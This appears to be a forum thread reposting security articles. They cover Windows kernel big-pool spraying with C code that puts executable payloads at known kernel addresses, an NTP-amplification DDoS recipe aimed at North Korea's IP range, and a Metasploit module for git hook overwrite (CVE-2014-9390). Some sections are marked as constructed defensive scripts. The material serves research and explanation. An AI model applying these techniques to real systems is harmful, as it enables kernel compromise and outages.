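    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)


# Constructed samples: class names come from the article, no payload is included.
CHAIN = _obj(b"Varien_File_Uploader_Image", [
    (b"uploader", _obj(b"Varien_Cache_Backend_Database", [
        (b"\x00*\x00_options", b"a:1:{" + _s(b"store_data") + b"b:1;}"),
    ])),
])
SCALARS = b"a:2:{" + _s(b"cht") + _s(b"lc") + _s(b"note") + _s(b'O:8:"stdClass":0:{}') + b"}"


def sample_url(blob):
    query = urlencode({"ga": base64.b64encode(blob).decode(), "h": "0" * 32})
    return "https://shop.example/?" + query
```

Because strings are skipped by their declared length, text that merely looks like an object inside a string value (as in `SCALARS`) is not reported, while both `objects` and `malformed` results are worth alerting on.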
  4. [h=2]Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool[/h]

[h=2]The State of Kernel Exploitation[/h]

The typical write-what-where kernel-mode exploit technique usually relies on either modifying some key kernel-mode data structure, which is easy to do locally on Windows thanks to poor Kernel Address Space Layout Randomization (KASLR), or on redirecting execution to a controlled user-mode address, which will now run with Ring 0 rights. Relying on a user-mode address is an easy way not to worry about the kernel address space, and to have full control of the code within a process. Editing the tagWND structure or the HAL Dispatch Table are two very common vectors, as are many others.

However, with Supervisor Mode Execution Prevention (SMEP), also called Intel OS Guard, this technique is no longer reliable — a direct user-mode address cannot be used, and other techniques must be employed instead.

One possibility is to disable SMEP Enforcement in the CR4 register through Return-Oriented Programming, or ROP, if stack control is possible. This has been covered in a few papers and presentations.

Another related possibility is to disable SMEP Enforcement on a per-page basis — taking a user-mode page and marking it as a kernel page by making the required changes in the page level translation mapping entries. This has also been talked about in at least one presentation, and, if accepted, a future SyScan 2015 talk from a friend of mine will also cover this technique. Additionally, if accepted, an alternate version of the technique will be presented at INFILTRATE 2015, by yours truly.

Finally, a theoretical possibility is being able to transfer execution (through a pointer, callback table, etc) to an existing function that disables SMEP (and thus bypassing KASLR), but then somehow continues to give the attacker control without ROP — nobody has yet found such a function. This would be a type of Jump-Oriented Programming (JOP) attack.
Nonetheless, all of these techniques continue to leverage a user-mode address as the main payload (nothing wrong with that). However, one must also consider the possibility to use a kernel-mode address for the attack, which means that no ROP and/or PTE hacking is needed to disable SMEP in the first place.

Obviously, this means that the function to perform the malicious payload’s work already exists in the kernel, or we have a way of bringing it into the kernel. In the case of a stack/pool overflow, this payload probably already comes with the attack, and the usual tricks have been employed there in order to get code execution. Such attacks are particularly common in true ‘remote-remote’ attacks.

But what of write-what-where bugs, usually the domain of the local (or remote-local) attacker? If we have user-mode code execution available to us, to execute the write-what-where, we can obviously continue using the write-what-where exploit to repeatedly fill an address of our choice with the payload data. This presents a few problems however:

• The write-what-where may be unreliable, or corrupt adjacent data. This makes it hard to use it to ‘fill’ memory with code.
• It may not be obvious where to write the code — having to deal with KASLR as well as Kernel NX. On Windows, this is not terribly hard, but it should be recognized as a barrier nonetheless.

This blog post introduces what I believe to be two new techniques, namely a generic kernel-mode heap spraying technique which results in executable memory, followed by a generic kernel-mode heap address discovery technique, bypassing KASLR.

[h=2]Big Pool[/h]

Experts of the Windows heap manager (called the pool) know that there are two different allocators (three, if you’re being pedantic): the regular pool allocator (which can use lookaside lists that work slightly differently than regular pool allocations), and the big/large page pool allocator.
The regular pool is used for any allocations that fit within a page, so either 4080 bytes on x86 (8 bytes for the pool header, and 8 bytes used for the initial free block), or 4064 bytes on x64 (16 bytes for the pool header, 16 bytes used for the initial free block). The tracking, mapping, and accounting of such allocations is handled as part of the regular slush of kernel-mode memory that the pool manager owns, and the pool headers link everything together.

Big pool allocations, on the other hand, take up one or more pages. They’re used for anything over the sizes above, as well as when the CacheAligned type of pool memory is used, regardless of the requested allocation size — there’s no way to easily guarantee cache alignment without dedicating a whole page to an allocation.

Because there’s no room for a header, these pages are tracked in a separate “Big Pool Tracking Table” (nt!PoolBigPageTable), and the pool tags, which are used to identify the owner of an allocation, are also not present in the header (since there isn’t one!), but rather in the table as well. Each entry in this table is represented by a POOL_TRACKER_BIG_PAGES structure, documented in the public symbols:

```
lkd> dt nt!_POOL_TRACKER_BIG_PAGES
   +0x000 Va               : Ptr32 Void
   +0x004 Key              : Uint4B
   +0x008 PoolType         : Uint4B
   +0x00c NumberOfBytes    : Uint4B
```

One thing to be aware of is that the Virtual Address (Va) is OR’ed with a bit to indicate if the allocation is freed or allocated — in other words, you may have duplicate Va’s, some freed, and at most one allocated. The following simple WinDBG script will dump all the big pool allocations for you:

```
r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable))
r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES)
.for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1)
{
    r? @$t3 = @$t0[@$t2];
    .if (@@(@$t3.Va != 1))
    {
        .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4
    }
}
```

Why are big pool allocations interesting? Unlike small pool allocations, which can share pages, and are hard to track for debugging purposes (without dumping the entire pool slush), big pool allocations are easy to enumerate. So easy, in fact, that the undocumented KASLR-be-damned API NtQuerySystemInformation has an information class specifically designed for dumping big pool allocations. Including not only their size, their tag, and their type (paged or nonpaged), but also their kernel virtual address!

As previously presented, this API requires no privileges, and only in Windows 8.1 has it been locked down against low integrity callers (Metro/Sandboxed applications).

With the little snippet of code below, you can easily enumerate all big pool allocations:

```c
//
// Note: This is poor programming (hardcoding 4MB).
// The correct way would be to issue the system call
// twice, and use the resultLength of the first call
// to dynamically size the buffer to the correct size
//
bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(),
                              0,
                              4 * 1024 * 1024);
if (bigPoolInfo == NULL) goto Cleanup;

res = NtQuerySystemInformation(SystemBigPoolInformation,
                               bigPoolInfo,
                               4 * 1024 * 1024,
                               &resultLength);
if (!NT_SUCCESS(res)) goto Cleanup;

printf("TYPE ADDRESS\tBYTES\tTAG\n");
for (i = 0; i < bigPoolInfo->Count; i++)
{
    printf("%s0x%p\t0x%lx\t%c%c%c%c\n",
           bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ?
               "Nonpaged " : "Paged ",
           bigPoolInfo->AllocatedInfo[i].VirtualAddress,
           bigPoolInfo->AllocatedInfo[i].SizeInBytes,
           bigPoolInfo->AllocatedInfo[i].Tag[0],
           bigPoolInfo->AllocatedInfo[i].Tag[1],
           bigPoolInfo->AllocatedInfo[i].Tag[2],
           bigPoolInfo->AllocatedInfo[i].Tag[3]);
}

Cleanup:
if (bigPoolInfo != NULL)
{
    RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo);
}
```

[h=2]Pool Control[/h]

Obviously, it’s quite useful to have all these handy kernel-mode addresses. But what can we do to control their data, and not only be able to read their address?

You may be aware of previous techniques where a user-mode attacker allocates a kernel-object (say, an APC Reserve Object), which has a few fields that are user-controlled, and which then has an API to get its kernel-mode address. We’re essentially going to do the same here, but rely on more than just a few fields. Our goal, therefore, is to find a user-mode API that can give us full control over the kernel-mode data of a kernel object, and additionally, to result in a big pool allocation.

This isn’t as hard as it sounds: anytime a kernel-mode component allocates over the limits above, a big pool allocation is done instead. Therefore, the exercise reduces itself to finding a user-mode API that can result in a kernel allocation of over 4KB, whose data is controlled. And since Windows XP SP2 and later enforce kernel-mode non-executable memory, the allocation should be executable as well.

Two easy examples may pop up in your head:

1. Creating a local socket, listening to it, connecting from another thread, accepting the connection, and then issuing a write of > 4KB of socket data, but not reading it. This will result in the Ancillary Function Driver for WinSock (AFD.SYS), also affectionately known as “Another F*cking Driver”, allocating the socket data in kernel-mode memory. Because the Windows network stack functions at DISPATCH_LEVEL (IRQL 2), and paging is not available, AFD will use a nonpaged pool buffer for the allocation. This is great, because until Windows 8, nonpaged pool is executable!
2. Creating a named pipe, and issuing a write of > 4KB of data, but not reading it. This will result in the Named Pipe File System (NPFS.SYS) allocating the pipe data in a nonpaged pool buffer as well (because NPFS performs buffer management at DISPATCH_LEVEL as well).

Ultimately, #2 is a lot easier, requiring only a few lines of code, and being much less conspicuous than using sockets. The important thing you have to know is that NPFS will prefix our buffer with its own internal header, which is called a DATA_ENTRY. Each version of NPFS has a slightly different size (XP- vs 2003+ vs Windows 8+).

I’ve found that the cleanest way to handle this, and not to worry about offsets in the final kernel payload, is to internally handle this in the user-mode buffer with the right offsets. And finally, remember that the key here is to have a buffer that’s at least the size of a page, so we can force the big pool allocator.

Here’s a little snippet that takes all this into account and will have the desired effects:

```c
UCHAR payLoad[PAGE_SIZE - 0x1C + 44];

//
// Fill the first page with 0x41414141, and the next page
// with INT3's (simulating our payload). On x86 Windows 7
// the size of a DATA_ENTRY is 28 bytes (0x1C).
//
RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41);
RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC);

//
// Write the data into the kernel
//
res = CreatePipe(&readPipe,
                 &writePipe,
                 NULL,
                 sizeof(payLoad));
if (res == FALSE) goto Cleanup;

res = WriteFile(writePipe,
                payLoad,
                sizeof(payLoad),
                &resultLength,
                NULL);
if (res == FALSE) goto Cleanup;

//
// extra code goes here...
//

Cleanup:
CloseHandle(writePipe);
CloseHandle(readPipe);
```

Now all we need to know is that NPFS uses the pool tag ‘NpFr’ for the read data buffers (you can find this out by using the !pool and !poolfind commands in WinDBG). We can then change the earlier KASLR-defeating snippet to hard-code the pool tag and expected allocation size, and we can instantly find the kernel-mode address of our buffer, which will fully match our user-mode buffer.

Keep in mind that the “Paged vs. Nonpaged” flag is OR’ed into the virtual address (this is different from the structure in the kernel, which tracks free vs. allocated), so we’ll mask that out, and also make sure you align the size to the pool header alignment (it’s enforced even for big pool allocations). Here’s that snippet, for x86 Windows:

```c
//
// Based on pooltag.txt, we're looking for the following:
// NpFr - npfs.sys - DATA_ENTRY records (r/w buffers)
//
for (entry = bigPoolInfo->AllocatedInfo;
     entry < (PSYSTEM_BIGPOOL_ENTRY)bigPoolInfo +
             bigPoolInfo->Count;
     entry++)
{
    if ((entry->NonPaged == 1) &&
        (entry->TagUlong == 'rFpN') &&
        (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44,
                                        ULONGLONG)))
    {
        printf("Kernel payload @ 0x%p\n",
               (ULONG_PTR)entry->VirtualAddress & ~1 +
               PAGE_SIZE);
        break;
    }
}
```

And here’s the proof in WinDBG:

Voila! Package this into a simple “kmalloc” helper function, and now you too, can allocate executable, kernel-mode memory, at a known address! How big can these allocations get? I’ve gone up to 128MB without a problem, but this being non-paged pool, make sure you have the RAM to handle it. Here’s a link to some sample code which implements exactly this functionality.

An additional benefit of this technique is that not only can you get the virtual address of your allocation, you can even get the physical address!
Indeed, as part of the undocumented Superfetch API that I first discovered and implemented in my meminfo tool, which has now been supplanted by the RAMMap utility from SysInternals, the memory manager will happily return the pool tag, virtual address, and physical address of our allocation.

Here’s a screenshot of RAMMap showing another payload allocation and its corresponding physical address (note that the 0x1000 difference is since the command-line PoC biases the pointer, as you saw in the code).

[h=2]Next Steps[/h]

Now, for full disclosure, there are a few additional caveats that make this technique a bit less sexy in 2015 — and why I chose to talk about it today, and not 8 years ago when I first stumbled upon it:

1) Starting with Windows 8, nonpaged pool allocations are now non-executable. This means that while this trick still lets you spray the pool, your code will require some sort of NX bypass first. So you’ve gone from bypassing SMEP to bypassing kernel-mode NX.

2) In Windows 8.1, the API to get the big pool entries and their addresses is no longer usable by low-integrity callers. This significantly reduces the usefulness in local-remote attacks, since those are usually launched through sandboxed applications (Flash, IE, Chrome, etc) and/or Metro containers.

Of course, there are some ways around this — a sandbox escape is often used in local-remote attacks anyway, so #2 can become moot. As for #1, some astute researchers have already figured out that NX was not fully deployed — for example, Session Pool allocations are STILL executable on newer versions of Windows, but only on x86 (32-bit). I leave it as an exercise to readers to figure out how this technique can be extended to leverage that (hint: there’s a ‘Big Session Pool’).

But what about a modern, 64-bit version of Windows, say even Windows 10? Well, this technique appears to be mostly dead on such systems — or does it? Is everything truly NX in the kernel, or are there still some sneaky ways to get some executable memory, and to get its address? I’ll be sure to blog about it once Windows 14 is out the door in 2022.

© Alex Ionescu
Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool « Alex Ionescu’s Blog
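From the analyst's side, the spray described in this post leaves many live, nonpaged big pool entries with the same tag and the same size. The following triage sketch is an added example, not code from the blog post; it reads the output of the WinDBG script shown earlier, and the threshold, the helper names and the sample dump are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# One line of the WinDBG script's .printf output (format string taken from the post).
ENTRY = re.compile(
    r"VA: 0x(?P<va>[0-9A-Fa-f`]+) Size: 0x(?P<size>[0-9A-Fa-f]+) "
    r"Tag: (?P<tag>.{4}) Freed: (?P<freed>\d) Paged: (?P<paged>\d) "
    r"CacheAligned: (?P<aligned>\d)"
)


def parse_dump(text):
    """Yield one dict per well-formed entry line; other lines are ignored."""
    for line in text.splitlines():
        m = ENTRY.search(line)
        if m:
            yield {
                "va": int(m["va"].replace("`", ""), 16),
                "size": int(m["size"], 16),
                "tag": m["tag"],
                "freed": m["freed"] == "1",
                "paged": m["paged"] == "1",
            }


def spray_candidates(text, min_count=32):
    """Group live nonpaged entries by (tag, size) and return the groups that
    repeat at least `min_count` times as (tag, size, count, total_bytes),
    largest total first. The threshold is a heuristic, not a known-good value."""
    groups = defaultdict(set)
    for entry in parse_dump(text):
        if entry["freed"] or entry["paged"]:
            continue  # freed table slots and pageable memory are out of scope
        groups[(entry["tag"], entry["size"])].add(entry["va"])  # count each VA once
    hits = [
        (tag, size, len(vas), size * len(vas))
        for (tag, size), vas in groups.items()
        if len(vas) >= min_count
    ]
    return sorted(hits, key=lambda hit: hit[3], reverse=True)


def constructed_dump():
    """Constructed sample: 64 same-sized NpFr buffers among unrelated entries."""
    lines = [
        "VA: 0x8a200000 Size: 0x4000 Tag: CM31 Freed: 0 Paged: 1 CacheAligned: 0",
        "VA: 0x86d01000 Size: 0x2000 Tag: Thre Freed: 0 Paged: 0 CacheAligned: 0",
        "VA: 0x85c3e000 Size: 0x1030 Tag: NpFr Freed: 1 Paged: 0 CacheAligned: 0",
    ]
    for i in range(64):
        va = 0x87000000 + i * 0x2000
        lines.append(
            f"VA: 0x{va:08x} Size: 0x1030 Tag: NpFr Freed: 0 Paged: 0 CacheAligned: 0"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    for tag, size, count, total in spray_candidates(constructed_dump()):
        print(f"{tag}: {count} live nonpaged allocations of 0x{size:x} bytes ({total} bytes)")
```

The size 0x1030 in the sample is the post's `ALIGN_UP(PAGE_SIZE + 44, ULONGLONG)` for a 4 KB page; legitimate pipe traffic also produces NpFr entries, so a hit is a lead to investigate rather than a verdict.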
  5. [h=3]Anybody can take North Korea offline[/h]

By Robert Graham

A couple days after the FBI blamed the Sony hack on North Korea, that country went offline. Many suspected the U.S. government, but the reality is that anybody can do it -- even you. I mention this because of a Vox.com story that claims "There is no way that Anonymous pulled off this scale of an attack on North Korea". That's laughably wrong, overestimating the scale of North Korea's Internet connection, and underestimating the scale of Anonymous's capabilities.

North Korea has a roughly 10-gbps link to the Internet for its IP addresses. That's only about ten times what Google fiber provides. In other words, 10 American households can have as much bandwidth as the entire country. Anonymous's capabilities exceed this, scaling past 1-terabit/second, or a hundred times more than needed to take down North Korea.

Attacks are made easier due to amplifiers on the Internet, which can increase the level of traffic by about 100 times. Thus, in order to overload a 10-gbps link of your target, you only need a 100-mbps link yourself. This is well within the capabilities of a single person.

Such attacks are difficult to do from your home, because your network connection is asymmetric. A 100-mbps from Comcast refers to the download speed -- it's only about 20-mbps in the other direction. You'll probably need to use web host services that sell high upload speed. You can cheaply get a 100-mbps or even 1-gbps upload connection for about $30 per month in bitcoin. You'll need to find one that doesn't do egress filtering, because you'll be spoofing North Korea's addresses, but that's rarely a problem.

You need some familiarity with command-line tools. In this age of iPads, the command-line seems like Dark Magic to some people, but it's something all computer geeks use regularly. Thus, to do these attacks, you'll need some basic geek skills, but they are something that can be acquired in a week.
How I would do it is roughly shown by the following command-line command. This uses some software I wrote for port-scanning, but as a side effect, it can also be used for these sorts of "amplified DDoS" attacks.

What we see in this command-line is the following:

• use spoofing as part of the attack
• targeting the North Korean IP addresses around 175.45.176.0
• bouncing the packets off a list of amplifiers
• building a custom NTP monlist packet that causes amplification
• sending to port 123 (NTP)
• sending at a rate of one million packets/second
• repeating the attack infinitely (never stopping)

For this attack to work, you'll need a list of amplifiers. You can find these lists in hacker forums, or you can just find the amplifiers yourself using masscan (after all, that's what port scanners are supposed to do).

I use masscan in my example because it's my tool, so it's how I'd do it, but no special tool is needed. You can write your own code to do it pretty easily, and there are tons of other tools that can be configured to do this. I stress this because people have this belief in the power of cyberweapons, that powerful effects like disabling a country can't happen without powerful weapons. This belief is nonsense.

It's unknown if Anonymous hackers actually DDoSed North Korea, like the "Lizard Squad" that claims responsibility, but it's easily within their capabilities. What's actually astonishing is that, since millions of people can so easily DDoS North Korea, it doesn't happen more often.

Note: This only takes down one aspect of the North Korean Internet. Satellite links, other telephony links, cell phones, and the ".kp" domain names would still be unaffected. It would take some skill to attack all those possibilities, but it appears that the hackers only did the simple DDoS.

Sursa: Errata Security: Anybody can take North Korea offline
  6. Umflatu'
  7. [h=1]12 Days of HaXmas: Exploiting CVE-2014-9390 in Git and Mercurial[/h]

Posted by jhart in Metasploit on Jan 1, 2015 2:18:22 PM

This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390. While the folks behind CVE are still publishing the final details, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances.

To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients. Under the hood, a Git or Mercurial repository on disk is really just a directory. In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that makes up the repository. Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previously mentioned metadata. So, in a way, if you had a Git repository called Test, Test/.git is the repository and everything else under the Test directory is simply a working copy of the files contained in the repository at a particular point in time. A nearly identical concept also exists in Mercurial.

Here is a quick example of a simple Git repository that has no files committed to it. As you can see, even this empty repository has a fair amount of metadata and a number of configuration files:

```
$ git init foo
$ tree -a foo
foo
└── .git
    ├── branches
    ├── config
    ├── description
    ├── HEAD
    ├── hooks
    │   ├── applypatch-msg.sample
    │   ├── commit-msg.sample
    │   ├── post-update.sample
    │   ├── pre-applypatch.sample
    │   ├── pre-commit.sample
    │   ├── prepare-commit-msg.sample
    │   ├── pre-rebase.sample
    │   └── update.sample
    ├── info
    │   └── exclude
    ├── objects
    │   ├── info
    │   └── pack
    └── refs
        ├── heads
        └── tags
```

If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory:

```
$ cd foo
$ date > test.txt && git add test.txt && git commit -m "Add test.txt" -a
[master (root-commit) fb19d8e] Add test.txt
 1 file changed, 1 insertion(+)
 create mode 100644 test.txt
$ git log
commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0
Author: Jon Hart
Date:   Wed Dec 31 09:08:41 2014 -0800

    Add test.txt
$ tree -a .
.
├── .git
│   ├── branches
│   ├── COMMIT_EDITMSG
│   ├── config
│   ├── description
│   ├── HEAD
│   ├── hooks
│   │   ├── applypatch-msg.sample
│   │   ├── commit-msg.sample
│   │   ├── post-update.sample
│   │   ├── pre-applypatch.sample
│   │   ├── pre-commit.sample
│   │   ├── prepare-commit-msg.sample
│   │   ├── pre-rebase.sample
│   │   └── update.sample
│   ├── index
│   ├── info
│   │   └── exclude
│   ├── logs
│   │   ├── HEAD
│   │   └── refs
│   │       └── heads
│   │           └── master
│   ├── objects
│   │   ├── 1c
│   │   │   └── 8fe13acf2178ea5130480625eef83a59497cb0
│   │   ├── 4b
│   │   │   └── 825dc642cb6eb9a060e54bf8d69288fbee4904
│   │   ├── e5
│   │   │   └── 58a44cf7fca31e7ae5f15e370e9a35bd1620f7
│   │   ├── fb
│   │   │   └── 19d8e1e5db83b4b11bbd7ed91e1120980a38e0
│   │   ├── info
│   │   └── pack
│   └── refs
│       ├── heads
│       │   └── master
│       └── tags
└── test.txt
```

Similarly, for Mercurial:

```
$ hg init blah
$ tree -a blah
blah
└── .hg
    ├── 00changelog.i
    ├── requires
    └── store

2 directories, 2 files
$ cd blah
$ date > test.txt && hg add test.txt && hg commit -m "Add test.txt"
$ hg log
changeset:   0:ea7dac4a11f0
tag:         tip
user:        Jon Hart
date:        Wed Dec 31 09:25:07 2014 -0800
summary:     Add test.txt

$ tree -a .
.
├── .hg
│   ├── 00changelog.i
│   ├── cache
│   │   └── branch2-served
│   ├── dirstate
│   ├── last-message.txt
│   ├── requires
│   ├── store
│   │   ├── 00changelog.i
│   │   ├── 00manifest.i
│   │   ├── data
│   │   │   └── test.txt.i
│   │   ├── fncache
│   │   ├── phaseroots
│   │   ├── undo
│   │   └── undo.phaseroots
│   ├── undo.bookmarks
│   ├── undo.branch
│   ├── undo.desc
│   └── undo.dirstate
└── test.txt
```

These directories (.git, .hg) are created by a client when the repository is initially created or cloned. The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples).

Want to learn more? Git Basics and Understanding Mercurial are great resources.

During routine repository operations such as cloning, updating, committing, etc, the repository working directory is updated to reflect the current state of the repository. Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt. This is where the trouble begins.

Both Git and Mercurial clients have had code for a long time that ensures that no commits are made to anything in the .git or .hg directories. Because these directories control client side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository.

Unfortunately these sensitive directories were not properly protected in all cases.
Specifically:

• On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (partially lower case) would not be blocked and would result in .git being modified because .git is equivalent to .giT on a case-insensitive file system.
• These same Git clients as well as Mercurial versions before 3.2.3 have a nearly identical vulnerability that affects HFS+ file systems (OS X and Windows) where certain Unicode codepoints are ignored in file names.
• Mercurial before 3.2.3 on Windows has a nearly identical vulnerability on Windows only where MS-DOS file "short names" or 8.3 formats are possible.

Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit it.

But basic exploitation is boring so in #4440 I've spiced things up a bit. As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git. Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (committing, updating, checkout, etc).
By default, this module overwrites the .git/hooks/post-checkout script which is executed upon completion of a checkout, which conveniently happens at clone time so the simple act of cloning a repository can allow arbitrary code execution on the Git client. It goes a little bit further and provides some simplistic HTML in the hopes of luring in potentially vulnerable clients:

And, if you clone it, it only looks mildly suspicious:

```
$ git clone http://10.0.1.18:8080/ldf.git
Cloning into 'ldf'...
$ cd ldf
$ git log
commit 858597e39d8a5d8e3511d404bcb210948dc835ae
Author: Deborah Phillips
Date:   Thu Apr 29 17:44:02 2004 -0500

    Initial commit to open git repository for nf.tygzxwf.xnk0lycynl.org!
```

The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community. Enjoy!

Sursa: https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
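The three name tricks described in this post can be checked for on the server or mirror side before a tree reaches a vulnerable client. The following scanner is an added example, not code from Git, Mercurial or Metasploit; the set of HFS+ ignorable code points and the `git~N` / `hg~N` short-name pattern are assumptions to verify against your client versions, and the sample listing is constructed.

```python
import re

# Directories whose contents control client-side behaviour.
PROTECTED = (".git", ".hg")

# Code points assumed to be ignored by HFS+ when it compares file names.
HFS_IGNORABLE = frozenset(
    [0x200C, 0x200D, 0x200E, 0x200F, 0xFEFF]
    + list(range(0x202A, 0x202F))  # U+202A..U+202E
    + list(range(0x206A, 0x2070))  # U+206A..U+206F
)

# 8.3 short names Windows may generate for ".git" / ".hg" (GIT~1, HG~1, ...).
SHORT_NAME = re.compile(r"^(git|hg)~[0-9]+$", re.IGNORECASE)


def classify(component):
    """Return why `component` would resolve to .git/.hg on some file system, or None."""
    if component in PROTECTED:
        return "exact name"
    if component.lower() in PROTECTED:
        return "case-insensitive alias"
    stripped = "".join(ch for ch in component if ord(ch) not in HFS_IGNORABLE)
    if stripped.lower() in PROTECTED:
        return "HFS+ ignorable code points"
    if SHORT_NAME.match(component):
        return "8.3 short name"
    return None


def scan_paths(paths):
    """Return (path, component, reason) for each path with a risky component."""
    findings = []
    for path in paths:
        # Backslash is also a path separator on Windows, so split on both.
        for component in re.split(r"[/\\]", path):
            reason = classify(component)
            if reason:
                findings.append((path, component, reason))
                break
    return findings


def scan_ls_tree(raw):
    """Scan the NUL-separated output of `git ls-tree -r -z --name-only <rev>`."""
    names = [n.decode("utf-8", "surrogateescape") for n in raw.split(b"\0") if n]
    return scan_paths(names)


# Constructed listing in the byte format that `git ls-tree -r -z --name-only` emits.
SAMPLE = "\0".join([
    "README.md",
    ".github/workflows/ci.yml",   # benign: a different name
    "vendor/lib.git/notes.txt",   # benign: ".git" is only a suffix
    ".giT/hooks/post-checkout",   # case variant
    ".g\u200cit/config",          # zero-width non-joiner inside the name
    "GIT~1/config",               # short-name form
    "sub/.HG/hgrc",               # Mercurial, nested, upper case
]).encode("utf-8") + b"\0"

if __name__ == "__main__":
    for path, component, reason in scan_ls_tree(SAMPLE):
        print(f"{reason:28} {component!r:14} {path!r}")
```

Using `-z` matters here: without it Git quotes non-ASCII path names, which would hide exactly the code points the HFS+ check looks for.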
  8. Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks

Hayden Dingman @haydencd

Did you spend Christmas mildly annoyed because you bought a new console, only to find that Xbox Live/PlayStation Network had been downed by a "nefarious" group known as Lizard Squad? Yes, I know it sounds like a bad episode of 24, but at least now you can revel in a bit of Schadenfreude: Two alleged members have been arrested this week.

Lizard Squad came to prominence in 2014 after taking down (or at least claiming to take down) the online presences of numerous gaming companies, including Blizzard, Activision, and Sony. Oh, and perpetrating a bomb threat against a Sony executive in August.

Its biggest (or at least most noticeable) moment came just this past week though, when Lizard Squad launched simultaneous DDoS attacks on Xbox Live and PlayStation Network. On Christmas. And then offered to sell its own DDoS tool to others. "Flying too close to the sun" comes to mind.

If this week is anything to go by, Lizard Squad is quickly unraveling. The first arrest was reported by Brian Krebs, who writes about security matters on his website Krebs On Security. On Monday he posted a bail document pertaining to one Vinnie Omari, a 22-year-old from Britain who is allegedly part of Lizard Squad. Omari later told The Daily Dot, "they took everything." The police raided Omari's home on Monday and took his computers for evidence, though Omari is out on bail until his hearing in March.

To top it off, Finland's National Bureau of Investigation (NBI) picked up another alleged member of Lizard Squad later in the week. The 17-year-old, known as "Ryan," acted as spokesperson for the group in the aftermath of the Christmas attacks. Unlike Omari, Lizard Squad told The Washington Post that Ryan remains in jail.

Sursa: Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks | PCWorld
  9. Potentially Unwanted Program borrows tricks from malware authors

December 31, 2014 | BY Jérôme Segura

These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it. Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they:

  • Provide a value added service to users by suggesting additional programs tailored to the users’ needs.
  • Offer a way for software manufacturers to monetize their free applications.

Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows:

Name: adobe_flash_setup.exe
Size: 809.0 KB
MD5: d549def7dd9006954839a187304e3835
imphash: 884310b1928934402ea6fec1dbd3cf5e

Out of the box

The first thing we noticed was that the program behaves differently depending on whether it is launched on a real physical machine or a Virtual Machine, as described in the diagram below:

In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player. By reverse engineering the installer, we can confirm the detection of Virtual Machines:

“VirtualMachine mode – remote offers disabled”

There might be a few reasons for this:

  • To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics.
  • To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers.

Anti-vm behavior does not necessarily mean that the application is malicious, but it is something that many malware authors use.

Time stamp

The program was compiled with a date of June 19th 1992, long before PUPs even existed:

By using an older time stamp, the program looks less suspicious and it is a technique that we observe with certain malware samples.

[Edit] @Hexacorn commented that this is actually a bug with the Delphi programming language.

Digital footprint

The file was digitally signed by Fried Cookie Ltd.
